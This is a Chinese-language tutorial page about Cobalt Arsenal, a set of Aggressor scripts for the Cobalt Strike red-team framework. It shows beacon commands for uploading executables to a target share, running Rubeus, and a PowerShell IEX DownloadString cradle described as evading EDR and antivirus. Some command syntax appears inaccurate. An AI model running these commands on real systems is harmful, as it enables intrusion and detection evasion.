首页
/ Cobalt Arsenal 项目教程

Cobalt Arsenal 项目教程

2024-09-13 05:48:29作者:庞眉杨Will

1. 项目介绍

Cobalt Arsenal 是由 Mariusz Banach 开发的一个开源项目,旨在为 Cobalt Strike 提供一系列经过实战检验的 Aggressor 脚本。这些脚本极大地增强了 Cobalt Strike 的功能,使其在红队操作和对手模拟中更加灵活和高效。项目包含了超过 3300 行代码,涵盖了从 Beacon 管理到 Payload 生成等多个方面的实用工具和增强功能。

2. 项目快速启动

2.1 环境准备

在开始之前,确保你已经安装了 Cobalt Strike 4.0 或更高版本,并且熟悉基本的 Aggressor 脚本语法。

2.2 下载与安装

  1. 克隆项目到本地:

    git clone https://github.com/mgeeky/cobalt-arsenal.git
    
  2. 将项目中的 .cna 脚本文件复制到 Cobalt Strike 的 scripts 目录下。

2.3 加载脚本

在 Cobalt Strike 中,通过 Script Manager 加载所需的 Aggressor 脚本。例如,加载 better-upload.cna

script_import "better-upload.cna"

2.4 使用示例

以下是一个简单的使用示例,展示如何使用 better-upload.cna 脚本上传文件到目标主机:

beacon> upload /path/to/local/file.exe \\target\c$\path\to\remote\file.exe

3. 应用案例和最佳实践

3.1 案例一:自动化初始任务

使用 Beacon_Initial_Tasks.cna 脚本,可以在 Beacon 首次签到时自动执行预定义的任务。例如,设置初始任务为执行一个 PowerShell 命令:

beacon> set_initial_tasks "execute-assembly C:\\tools\\Rubeus.exe hash /password:test"

3.2 案例二:自定义 PowerShell 下载执行

使用 custom-powershell-hooks.cna 脚本,可以自定义 PowerShell 下载和执行的命令,避免被常见的 EDR 和 AV 检测:

beacon> set POWERSHELL_DOWNLOAD_CRADLE "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')"

4. 典型生态项目

4.1 Cobalt Strike 官方社区工具包

Cobalt Strike 官方提供了一个社区工具包(Community Kit),其中包含了大量由社区贡献的 Aggressor 脚本和工具,可以与 Cobalt Arsenal 结合使用,进一步提升红队操作的效率。

4.2 Outflank Security Tooling

Outflank Security Tooling 是一个精选的进攻性安全工具集,设计用于增强 Cobalt Strike 的规避能力。通过与 Cobalt Strike 结合使用,可以扩展红队操作的范围和深度。

4.3 Core Impact

Core Impact 是 Fortra 提供的一款渗透测试工具,可以与 Cobalt Strike 协同工作,共享资源并部署 Beacon 进行会话传递和隧道功能。结合使用可以提供更全面的渗透测试解决方案。

登录后查看全文
热门项目推荐

项目优选

收起
kernelkernel
deepin linux kernel
C
22
6
docsdocs
OpenHarmony documentation | OpenHarmony开发者文档
Dockerfile
162
2.05 K
nop-entropynop-entropy
Nop Platform 2.0是基于可逆计算理论实现的采用面向语言编程范式的新一代低代码开发平台,包含基于全新原理从零开始研发的GraphQL引擎、ORM引擎、工作流引擎、报表引擎、规则引擎、批处理引引擎等完整设计。nop-entropy是它的后端部分,采用java语言实现,可选择集成Spring框架或者Quarkus框架。中小企业可以免费商用
Java
8
0
ShopXO开源商城ShopXO开源商城
🔥🔥🔥ShopXO企业级免费开源商城系统,可视化DIY拖拽装修、包含PC、H5、多端小程序(微信+支付宝+百度+头条&抖音+QQ+快手)、APP、多仓库、多商户、多门店、IM客服、进销存,遵循MIT开源协议发布、基于ThinkPHP8框架研发
JavaScript
96
15
ohos_react_nativeohos_react_native
React Native鸿蒙化仓库
C++
199
279
leetcodeleetcode
🔥LeetCode solutions in any programming language | 多种编程语言实现 LeetCode、《剑指 Offer(第 2 版)》、《程序员面试金典(第 6 版)》题解
Java
60
16
Git4ResearchGit4Research
Git4Research旨在构建一个开放、包容、协作的研究社区,让更多人能够参与到科学研究中,共同推动知识的进步。
HTML
22
1
apintoapinto
基于golang开发的网关。具有各种插件,可以自行扩展,即插即用。此外,它可以快速帮助企业管理API服务,提高API服务的稳定性和安全性。
Go
22
0
RuoYi-Vue3RuoYi-Vue3
🎉 (RuoYi)官方仓库 基于SpringBoot,Spring Security,JWT,Vue3 & Vite、Element Plus 的前后端分离权限管理系统
Vue
950
557
risc-v64-naruto-pirisc-v64-naruto-pi
基于QEMU构建的RISC-V64 SOC,支持Linux,baremetal, RTOS等,适合用来学习Linux,后续还会添加大量的controller,实现无需实体开发板,即可学习Linux和RISC-V架构
C
19
5